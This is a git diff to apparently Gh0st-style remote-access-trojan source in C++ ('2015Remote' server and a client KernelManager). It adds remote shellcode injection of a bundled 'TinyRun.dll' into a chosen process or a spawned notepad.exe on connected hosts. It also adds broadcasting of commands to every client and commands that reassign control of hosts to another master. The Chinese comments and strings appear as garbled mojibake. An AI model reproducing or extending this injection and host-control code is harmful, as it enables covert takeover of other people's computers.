diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index f0186ca..c458a07 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -185,24 +185,18 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
 #else
     DllRunner* runner = new MemoryDllRunner();
 #endif
-    HMEMORYMODULE module = runner->LoadLibraryA((char*)dll->buffer, info.Size);
-    if (module) {
+    if (info.RunType == MEMORYDLL) {
+        HMEMORYMODULE module = runner->LoadLibraryA((char*)dll->buffer, info.Size);
         switch (info.CallType) {
         case CALLTYPE_DEFAULT:
             while (S_CLIENT_EXIT != *pThread.Exit)
                 Sleep(1000);
             break;
         case CALLTYPE_IOCPTHREAD: {
-            PTHREAD_START_ROUTINE proc = (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run");
+            PTHREAD_START_ROUTINE proc =  module ? (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run") : NULL;
             Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
             if (proc) {
-                if (info.RunType == MEMORYDLL)
-                    proc(&pThread);
-                else if (info.RunType == SHELLCODE){
-					ShellcodeInj inj(dll->buffer, info.Size, "run", &pThread, sizeof(PluginParam));
-                    if (info.Pid < 0) info.Pid = GetCurrentProcessId();
-                    bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
-                }
+                proc(&pThread);
             } else {
                 while (S_CLIENT_EXIT != *pThread.Exit)
                     Sleep(1000);
@@ -213,8 +207,12 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
             break;
         }
         runner->FreeLibrary(module);
-    } else {
-        Mprintf("MemoryLoadLibrary '%s' failed\n", info.Name);
+    } else if (info.RunType == SHELLCODE){
+		bool flag = info.CallType == CALLTYPE_IOCPTHREAD;
+		ShellcodeInj inj(dll->buffer, info.Size, flag ? "run" : 0, flag ? &pThread : 0, flag ? sizeof(PluginParam) : 0);
+		if (info.Pid < 0) info.Pid = GetCurrentProcessId();
+		bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
+        Mprintf("Inject %s to process [%d] %s\n", info.Name, info.Pid, ret ? "succeed" : "failed");
     }
     SAFE_DELETE(dll);
     SAFE_DELETE(runner);
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index 9a87297..2e7a7a3 100644
Binary files a/server/2015Remote/2015Remote.rc and b/server/2015Remote/2015Remote.rc differ
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 5192e45..31fbbb1 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -281,6 +281,25 @@ DllInfo* ReadPluginDll(const std::string& filename)
     return new DllInfo{ name, buf };
 }
 
+DllInfo* ReadTinyRunDll(int pid) {
+    std::string name = "TinyRun.dll";
+    DWORD fileSize = 0;
+    BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize);
+	// è®¾ç½®è¾“å‡ºå‚æ•°
+	auto md5 = CalcMD5FromBytes(dllData, fileSize);
+    DllExecuteInfo info = { SHELLCODE, fileSize, CALLTYPE_DEFAULT, {}, {}, pid };
+	memcpy(info.Name, name.c_str(), name.length());
+	memcpy(info.Md5, md5.c_str(), md5.length());
+    BYTE* buffer = new BYTE[1 + sizeof(DllExecuteInfo) + fileSize];
+	buffer[0] = CMD_EXECUTE_DLL;
+	memcpy(buffer + 1, &info, sizeof(DllExecuteInfo));
+    memcpy(buffer + 1 + sizeof(DllExecuteInfo), dllData, fileSize);
+	Buffer* buf = new Buffer(buffer, 1 + sizeof(DllExecuteInfo) + fileSize, 0, md5);
+    SAFE_DELETE_ARRAY(dllData);
+	SAFE_DELETE_ARRAY(buffer);
+	return new DllInfo{ name, buf };
+}
+
 std::vector<DllInfo*> ReadAllDllFilesWindows(const std::string& dirPath)
 {
     std::vector<DllInfo*> result;
@@ -457,6 +476,10 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
     ON_MESSAGE(WM_PASSWORDCHECK, OnPasswordCheck)
     ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage)
     ON_MESSAGE(WM_SHOWERRORMSG, OnShowErrMessage)
+    ON_MESSAGE(WM_INJECT_SHELLCODE, InjectShellcode)
+    ON_MESSAGE(WM_SHARE_CLIENT, ShareClient)
+    ON_MESSAGE(WM_ASSIGN_CLIENT, AssignClient)
+    ON_MESSAGE(WM_ASSIGN_ALLCLIENT, AssignAllClient)
     ON_WM_HELPINFO()
     ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare)
     ON_COMMAND(ID_TOOL_AUTH, &CMy2015RemoteDlg::OnToolAuth)
@@ -697,6 +720,8 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName
             SetClientMapData(id, MAP_LOCATION, loc);
         }
     }
+    bool flag = strIP == "127.0.0.1" && !v[RES_CLIENT_PUBIP].empty();
+    data[ONLINELIST_IP] = flag ? v[RES_CLIENT_PUBIP].c_str() : strIP;
     data[ONLINELIST_LOCATION] = loc;
     ContextObject->SetClientInfo(data, v);
     ContextObject->SetID(id);
@@ -721,10 +746,9 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName
     if (modify)
         SaveToFile(m_ClientMap, GetDbPath());
     auto& m = m_ClientMap[ContextObject->ID];
-    bool flag = strIP == "127.0.0.1" && !v[RES_CLIENT_PUBIP].empty();
     m_HostList.insert(ContextObject);
     if (groupName == m_selectedGroup || (groupName.empty() && m_selectedGroup == "default")) {
-        int i = m_CList_Online.InsertItem(m_CList_Online.GetItemCount(), flag ? v[RES_CLIENT_PUBIP].c_str() : strIP);
+        int i = m_CList_Online.InsertItem(m_CList_Online.GetItemCount(), data[ONLINELIST_IP]);
         for (int n = ONLINELIST_ADDR; n <= ONLINELIST_CLIENTTYPE; n++) {
             n == ONLINELIST_COMPUTER_NAME ?
             m_CList_Online.SetItemText(i, n, m.GetNote()[0] ? m.GetNote() : data[n]) :
@@ -1792,6 +1816,25 @@ VOID CMy2015RemoteDlg::SendSelectedCommand(PBYTE  szBuffer, ULONG ulLength)
     LeaveCriticalSection(&m_cs);
 }
 
+VOID CMy2015RemoteDlg::SendAllCommand(PBYTE  szBuffer, ULONG ulLength)
+{
+	EnterCriticalSection(&m_cs);
+	for (int i=0; i<m_CList_Online.GetItemCount(); ++i){
+		context* ContextObject = (context*)m_CList_Online.GetItemData(i);
+		if (!ContextObject->IsLogin() && szBuffer[0] != COMMAND_BYE)
+			continue;
+		if (szBuffer[0] == COMMAND_UPDATE) {
+			CString data = ContextObject->GetClientData(ONLINELIST_CLIENTTYPE);
+			if (data == "SC" || data == "MDLL") {
+				ContextObject->Send2Client(szBuffer, 1);
+				continue;
+			}
+		}
+		ContextObject->Send2Client(szBuffer, ulLength);
+	}
+	LeaveCriticalSection(&m_cs);
+}
+
 //çœŸå½©Bar
 VOID CMy2015RemoteDlg::OnAbout()
 {
@@ -2181,11 +2224,18 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
     }
     case CMD_EXECUTE_DLL: { // è¯·æ±‚DLLï¼ˆæ‰§è¡Œä»£ç ï¼‰ã€Lã€‘
         DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1);
+        if (std::string(info->Name) == "TinyRun.dll") {
+			auto tinyRun = ReadTinyRunDll(info->Pid);
+			Buffer* buf = tinyRun->Data;
+            ContextObject->Send2Client(buf->Buf(), tinyRun->Data->length());
+            SAFE_DELETE(tinyRun);
+            break;
+		}
         for (std::vector<DllInfo*>::const_iterator i=m_DllList.begin(); i!=m_DllList.end(); ++i) {
             DllInfo* dll = *i;
             if (dll->Name == info->Name) {
                 // TODO å¦‚æžœæ˜¯UDPï¼Œå‘é€å¤§åŒ…æ•°æ®åŸºæœ¬ä¸Šä¸å¯èƒ½æˆåŠŸ
-                ContextObject->Send2Client( dll->Data->Buf(), dll->Data->length());
+                ContextObject->Send2Client(dll->Data->Buf(), dll->Data->length());
                 break;
             }
         }
@@ -2597,14 +2647,23 @@ void CMy2015RemoteDlg::OnOnlineShare()
         MessageBox("å­—ç¬¦ä¸²é•¿åº¦è¶…å‡º[0, 250]èŒƒå›´é™åˆ¶!", "æç¤º", MB_ICONINFORMATION);
         return;
     }
-
-    BYTE bToken[_MAX_PATH] = { COMMAND_SHARE };
-    // ç›®æ ‡ä¸»æœºç±»åž‹
-    bToken[1] = SHARE_TYPE_YAMA;
-    memcpy(bToken + 2, dlg.m_str, dlg.m_str.GetLength());
-    SendSelectedCommand(bToken, sizeof(bToken));
+    char* buf = new char[dlg.m_str.GetLength()+1];
+    memcpy(buf, dlg.m_str, dlg.m_str.GetLength());
+    buf[dlg.m_str.GetLength()] = 0;
+    PostMessageA(WM_SHARE_CLIENT, (WPARAM)buf, NULL);
 }
 
+LRESULT CMy2015RemoteDlg::ShareClient(WPARAM wParam, LPARAM lParam) {
+    char* buf = (char*)wParam;
+    int len = strlen(buf);
+	BYTE bToken[_MAX_PATH] = { COMMAND_SHARE };
+	// ç›®æ ‡ä¸»æœºç±»åž‹
+	bToken[1] = SHARE_TYPE_YAMA;
+	memcpy(bToken + 2, buf, len);
+	lParam ? SendAllCommand(bToken, sizeof(bToken)) : SendSelectedCommand(bToken, sizeof(bToken));
+    SAFE_DELETE_AR(buf);
+    return S_OK;
+}
 
 void CMy2015RemoteDlg::OnToolAuth()
 {
@@ -3333,16 +3392,37 @@ void CMy2015RemoteDlg::OnOnlineAssignTo()
         MessageBox("è¶…å‡ºä½¿ç”¨æ—¶é—´å¯è¾“å…¥çš„å­—ç¬¦æ•°é™åˆ¶!", "æç¤º", MB_ICONINFORMATION);
         return;
     }
-
-    BYTE bToken[_MAX_PATH] = { COMMAND_ASSIGN_MASTER };
-    // ç›®æ ‡ä¸»æœºç±»åž‹
-    bToken[1] = SHARE_TYPE_YAMA_FOREVER;
-    memcpy(bToken + 2, dlg.m_str, dlg.m_str.GetLength());
-    bToken[2 + dlg.m_str.GetLength()] = ':';
-    memcpy(bToken + 2 + dlg.m_str.GetLength() + 1, dlg.m_sSecondInput, dlg.m_sSecondInput.GetLength());
-    SendSelectedCommand(bToken, sizeof(bToken));
+    char* buf1 = new char[dlg.m_str.GetLength() + 1];
+    char *buf2 = new char[dlg.m_sSecondInput.GetLength() + 1];
+    memcpy(buf1, dlg.m_str, dlg.m_str.GetLength());
+    memcpy(buf2, dlg.m_sSecondInput, dlg.m_sSecondInput.GetLength());
+    buf1[dlg.m_str.GetLength()] = 0;
+    buf2[dlg.m_sSecondInput.GetLength()] = 0;
+    PostMessageA(WM_ASSIGN_CLIENT, (WPARAM)buf1, (LPARAM)buf2);
 }
 
+LRESULT CMy2015RemoteDlg::assignFunction(WPARAM wParam, LPARAM lParam, BOOL all) {
+	char* buf1 = (char*)wParam, * buf2 = (char*)lParam;
+	int len1 = strlen(buf1), len2 = strlen(buf2);
+	BYTE bToken[_MAX_PATH] = { COMMAND_ASSIGN_MASTER };
+	// ç›®æ ‡ä¸»æœºç±»åž‹
+	bToken[1] = SHARE_TYPE_YAMA_FOREVER;
+	memcpy(bToken + 2, buf1, len1);
+	bToken[2 + len1] = ':';
+	memcpy(bToken + 2 + len1 + 1, buf2, len2);
+	all ? SendAllCommand(bToken, sizeof(bToken)) : SendSelectedCommand(bToken, sizeof(bToken));
+	SAFE_DELETE_AR(buf1);
+	SAFE_DELETE_AR(buf2);
+	return S_OK;
+}
+
+LRESULT CMy2015RemoteDlg::AssignClient(WPARAM wParam, LPARAM lParam) {
+    return assignFunction(wParam, lParam, FALSE);
+}
+
+LRESULT CMy2015RemoteDlg::AssignAllClient(WPARAM wParam, LPARAM lParam) {
+    return assignFunction(wParam, lParam, TRUE);
+}
 
 void CMy2015RemoteDlg::OnNMCustomdrawMessage(NMHDR* pNMHDR, LRESULT* pResult)
 {
@@ -3755,3 +3835,35 @@ void CMy2015RemoteDlg::OnToolReloadPlugins()
 	GET_FILEPATH(path, "Plugins");
 	m_DllList = ReadAllDllFilesWindows(path);
 }
+
+context* CMy2015RemoteDlg::FindHostByIP(const std::string& ip) {
+    CString clientIP(ip.c_str());
+	EnterCriticalSection(&m_cs);
+	for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
+		context* ContextObject = *i;
+        if (ContextObject->GetClientData(ONLINELIST_IP) == clientIP) {
+            LeaveCriticalSection(&m_cs);
+			return ContextObject;
+        }
+    }
+	LeaveCriticalSection(&m_cs);
+    return NULL;
+}
+
+LRESULT CMy2015RemoteDlg::InjectShellcode(WPARAM wParam, LPARAM lParam){
+    std::string* ip = (std::string*)wParam;
+    int pid = lParam;
+    InjectTinyRunDll(*ip, pid);
+    delete ip;
+    return S_OK;
+}
+
+void CMy2015RemoteDlg::InjectTinyRunDll(const std::string& ip, int pid){
+	auto ctx = FindHostByIP(ip);
+	if (ctx == NULL)return;
+
+    auto tinyRun = ReadTinyRunDll(pid);
+	Buffer* buf = tinyRun->Data;
+	ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
+    SAFE_DELETE(tinyRun);
+}
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index ed209aa..be53311 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -211,6 +211,7 @@ public:
     static BOOL CALLBACK OfflineProc(CONTEXT_OBJECT* ContextObject);
     VOID MessageHandle(CONTEXT_OBJECT* ContextObject);
     VOID SendSelectedCommand(PBYTE  szBuffer, ULONG ulLength);
+    VOID SendAllCommand(PBYTE  szBuffer, ULONG ulLength);
     // ÏÔÊ¾ÓÃ»§ÉÏÏßÐÅÏ¢
     CWnd* m_pFloatingTip = nullptr;
     CListCtrl  m_CList_Online;
@@ -225,6 +226,8 @@ public:
     CTrueColorToolBar m_ToolBar;
     CGridDialog * m_gridDlg = NULL;
     std::vector<DllInfo*> m_DllList;
+    context* FindHostByIP(const std::string& ip);
+    void InjectTinyRunDll(const std::string& ip, int pid);
     NOTIFYICONDATA  m_Nid;
     HANDLE m_hExit;
     CRITICAL_SECTION m_cs;
@@ -296,6 +299,11 @@ public:
     afx_msg LRESULT OnOpenFileMgrDialog(WPARAM wParam, LPARAM lParam);
     afx_msg LRESULT OnOpenDrawingBoard(WPARAM wParam, LPARAM lParam);
     afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam);
+    afx_msg LRESULT InjectShellcode(WPARAM wParam, LPARAM lParam);
+    afx_msg LRESULT ShareClient(WPARAM wParam, LPARAM lParam);
+    LRESULT assignFunction(WPARAM wParam, LPARAM lParam, BOOL all);
+    afx_msg LRESULT AssignClient(WPARAM wParam, LPARAM lParam);
+    afx_msg LRESULT AssignAllClient(WPARAM wParam, LPARAM lParam);
     afx_msg BOOL OnHelpInfo(HELPINFO* pHelpInfo);
     virtual BOOL PreTranslateMessage(MSG* pMsg);
     afx_msg void OnOnlineShare();
diff --git a/server/2015Remote/SystemDlg.cpp b/server/2015Remote/SystemDlg.cpp
index 10d5a76..6221d81 100644
--- a/server/2015Remote/SystemDlg.cpp
+++ b/server/2015Remote/SystemDlg.cpp
@@ -23,6 +23,7 @@ IMPLEMENT_DYNAMIC(CSystemDlg, CDialog)
 CSystemDlg::CSystemDlg(CWnd* pParent, Server* IOCPServer, CONTEXT_OBJECT *ContextObject)
     : DialogBase(CSystemDlg::IDD, pParent, IOCPServer, ContextObject, IDI_SERVICE)
 {
+    m_pParent = pParent;
     m_bHow= m_ContextObject->InDeCompressedBuffer.GetBYTE(0);
 }
 
@@ -50,6 +51,7 @@ BEGIN_MESSAGE_MAP(CSystemDlg, CDialog)
     ON_COMMAND(ID_WLIST_RECOVER, &CSystemDlg::OnWlistRecover)
     ON_COMMAND(ID_WLIST_MAX, &CSystemDlg::OnWlistMax)
     ON_COMMAND(ID_WLIST_MIN, &CSystemDlg::OnWlistMin)
+    ON_COMMAND(ID_PLIST_INJECT, &CSystemDlg::OnPlistInject)
 END_MESSAGE_MAP()
 
 
@@ -454,3 +456,31 @@ void CSystemDlg::OnSize(UINT nType, int cx, int cy)
     // ÖØÐÂÉèÖÃ¿Ø¼þ´óÐ¡
     m_ControlList.MoveWindow(0, 0, cx, cy, TRUE);
 }
+
+
+void CSystemDlg::OnPlistInject()
+{
+	CListCtrl* ListCtrl = NULL;
+	if (m_ControlList.IsWindowVisible())
+		ListCtrl = &m_ControlList;
+	else
+		return;
+
+	if (ListCtrl->GetSelectedCount() != 1) 
+        ::MessageBox(m_hWnd, "Ö»ÄÜÍ¬Ê±ÏòÒ»¸ö½ø³Ì½øÐÐ´úÂë×¢Èë!", "ÌáÊ¾", MB_ICONINFORMATION);
+
+	if (::MessageBox(m_hWnd, "È·¶¨ÒªÏòÄ¿±ê½ø³Ì (½öÏÞ64Î») ½øÐÐ´úÂë×¢ÈëÂð?\n´Ë²Ù×÷¿ÉÄÜ±»°²È«Èí¼þ×èÖ¹£¬»òµ¼ÖÂ½ø³Ì±ÀÀ£!", 
+        "¾¯¸æ", MB_YESNO | MB_ICONQUESTION) == IDNO) 
+		return;
+
+	DWORD	dwOffset = 1, dwProcessID = 0;
+	POSITION Pos = ListCtrl->GetFirstSelectedItemPosition();
+	if (Pos) {
+		int	nItem = ListCtrl->GetNextSelectedItem(Pos);
+		auto data = (ItemData*)ListCtrl->GetItemData(nItem);
+		dwProcessID = data->ID;
+		dwOffset += sizeof(DWORD);
+	}
+    ASSERT(m_pParent);
+    m_pParent->PostMessageA(WM_INJECT_SHELLCODE, (WPARAM)new std::string(m_ContextObject->PeerName), dwProcessID);
+}
diff --git a/server/2015Remote/SystemDlg.h b/server/2015Remote/SystemDlg.h
index 17e3fe5..9873993 100644
--- a/server/2015Remote/SystemDlg.h
+++ b/server/2015Remote/SystemDlg.h
@@ -17,6 +17,7 @@ public:
     void ShowWindowsList(void);
     void GetWindowsList(void);
     void OnReceiveComplete(void);
+    CWnd* m_pParent;
     BOOL   m_bHow;
 // ¶Ô»°¿òÊý¾Ý
     enum { IDD = IDD_DIALOG_SYSTEM };
@@ -45,4 +46,5 @@ public:
     afx_msg void OnWlistMax();
     afx_msg void OnWlistMin();
     afx_msg void OnSize(UINT nType, int cx, int cy);
+    afx_msg void OnPlistInject();
 };
diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 76d52b1..caecda2 100644
Binary files a/server/2015Remote/resource.h and b/server/2015Remote/resource.h differ
diff --git a/server/2015Remote/stdafx.h b/server/2015Remote/stdafx.h
index abdc107..50039c4 100644
--- a/server/2015Remote/stdafx.h
+++ b/server/2015Remote/stdafx.h
@@ -85,6 +85,10 @@
 #define WM_SHOWMESSAGE					WM_USER+3022
 #define WM_SHOWERRORMSG					WM_USER+3023
 #define WM_SESSION_ACTIVATED			WM_USER+3024
+#define WM_INJECT_SHELLCODE				WM_USER+3025
+#define WM_SHARE_CLIENT					WM_USER+3026
+#define WM_ASSIGN_CLIENT				WM_USER+3027
+#define WM_ASSIGN_ALLCLIENT				WM_USER+3028
 
 #ifdef _UNICODE
 #if defined _M_IX86